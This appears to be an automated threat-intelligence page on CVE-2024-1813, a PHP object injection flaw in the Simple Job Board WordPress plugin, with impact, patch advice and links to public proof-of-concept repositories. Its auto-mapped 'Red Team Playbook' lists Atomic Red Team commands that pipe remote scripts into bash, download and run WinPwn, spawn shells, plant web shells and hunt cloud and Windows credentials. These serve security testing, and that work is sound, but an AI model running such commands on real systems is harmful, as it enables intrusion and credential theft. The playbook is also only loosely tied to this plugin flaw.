CVE-2024-1813
Overview
This vulnerability is a PHP Object Injection caused by insecure deserialization of untrusted input within the Simple Job Board WordPress plugin. The flaw resides in the job_board_applicant_list_columns_value function, which processes serialized data without proper validation. This unsafe deserialization enables injection of crafted PHP objects, affecting all versions up to and including 2.11.0 of the plugin.
Vulnerability Description
The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.11.0 via deserialization of untrusted input in the job_board_applicant_list_columns_value function. This makes it possible for unauthenticated attackers to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code when a submitted job application is viewed.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by submitting malicious job applications, requiring no user interaction or privileges. Successful exploitation can lead to arbitrary file deletion, sensitive data disclosure, and remote code execution on the affected server. This results in potential full system compromise, data breaches, and service disruption. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms network attackability with low complexity and no privileges or user interaction needed.
Solution
Users should upgrade the Simple Job Board plugin to a version later than 2.11.0 where this vulnerability is patched. The Wordfence advisory and the WordPress plugin trac provide detailed patch commits and instructions. No alternative workarounds are documented; immediate update to the fixed version is recommended to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Simple Job Board plugin for WordPress stems from a critical flaw in the deserialization process of untrusted input within the job_board_applicant_list_columns_value function. This vulnerability allows for PHP Object Injection, which occurs when an attacker can manipulate serialized data to inject malicious objects into the application. The flaw is particularly severe due to the lack of proper validation and sanitization of user input, which is a common oversight in many web applications. When the application processes this untrusted input, it can lead to the execution of arbitrary PHP code, file deletions, or unauthorized access to sensitive data, especially if a chain of vulnerable objects (known as a "POP chain") is present through other plugins or themes.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting unauthenticated users. An attacker could submit a crafted job application that includes malicious serialized data. Once this data is processed by the vulnerable function, the attacker can leverage the PHP Object Injection to execute arbitrary code on the server. For instance, if the attacker has knowledge of other installed plugins or themes that are susceptible to exploitation, they could orchestrate a series of actions to escalate their privileges or gain access to sensitive information. This could lead to scenarios where attackers delete critical files, manipulate job application data, or even gain full control over the WordPress installation.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the Simple Job Board plugin for their recruitment processes. The potential for unauthorized file deletion could disrupt business operations, while the exposure of sensitive data could lead to compliance violations and loss of customer trust. Additionally, the ability to execute arbitrary code opens the door for further attacks, potentially leading to a complete compromise of the affected WordPress site. The high CVSS score of 9.8 underscores the critical nature of this vulnerability, indicating that organizations must prioritize its remediation to avoid severe repercussions.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular security audits and vulnerability assessments should be conducted to identify outdated or vulnerable plugins. It is essential to keep the Simple Job Board plugin and all other components of the WordPress installation up to date, as updates often include patches for known vulnerabilities. Additionally, employing a Web Application Firewall (WAF) can help filter out malicious requests and provide an additional layer of security. Organizations should also consider implementing input validation and sanitization practices to prevent untrusted data from being processed. Finally, monitoring logs for unusual activity related to job applications can help detect potential exploitation attempts early, allowing for swift remediation actions.
In conclusion, the vulnerability present in the Simple Job Board plugin poses a serious threat to WordPress installations, particularly those that handle sensitive information through job applications. The ease of exploitation and the potential for significant damage necessitate immediate attention from organizations utilizing this plugin. By adopting proactive security measures and maintaining an awareness of the evolving threat landscape, organizations can better protect themselves against such vulnerabilities and mitigate the associated risks.
CSURFACE threat intelligence has identified the emergence of a public proof-of-concept exploit targeting CVE-2024-1813, hosted on a widely accessible platform. This development marks a significant shift in the exploit landscape, as previously no publicly available exploit code was detected. Despite this, our telemetry indicates a marked reduction in active exploitation attempts, reflected by a declining EPSS score and a downward trend over the past week. The availability of proof-of-concept code lowers the barrier for threat actors to weaponize this vulnerability, potentially accelerating the pace of exploitation in less secure environments or among less skilled adversaries. However, the current low exploitation activity suggests that widespread attacks have not yet materialized. Defenders should remain vigilant, as the presence of publicly accessible exploit code often precedes an increase in exploitation campaigns, especially in ecosystems reliant on vulnerable plugin versions. This update slightly elevates the threat level by introducing greater accessibility to exploitation tools, even as immediate exploitation remains limited.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Presstigers | Simple Job Board | All |
cpe:2.3:a:presstigers:simple_job_board:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
webshellseo8/CVE-2024-1813-Proof-of-Concept
|
webshellseo8 | 0 | 0 | 2026-07-29 | View |
|
MobetaSec/CVE-2024-1813-POC
|
MobetaSec | 0 | 0 | 2026-06-18 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-1813 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/89584034-4a93-42a6-8fef-55dc3895c45c?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3051715%40simple-job-board&old=3038476%40simple-job-board&sfp_email=&sfph_mail= |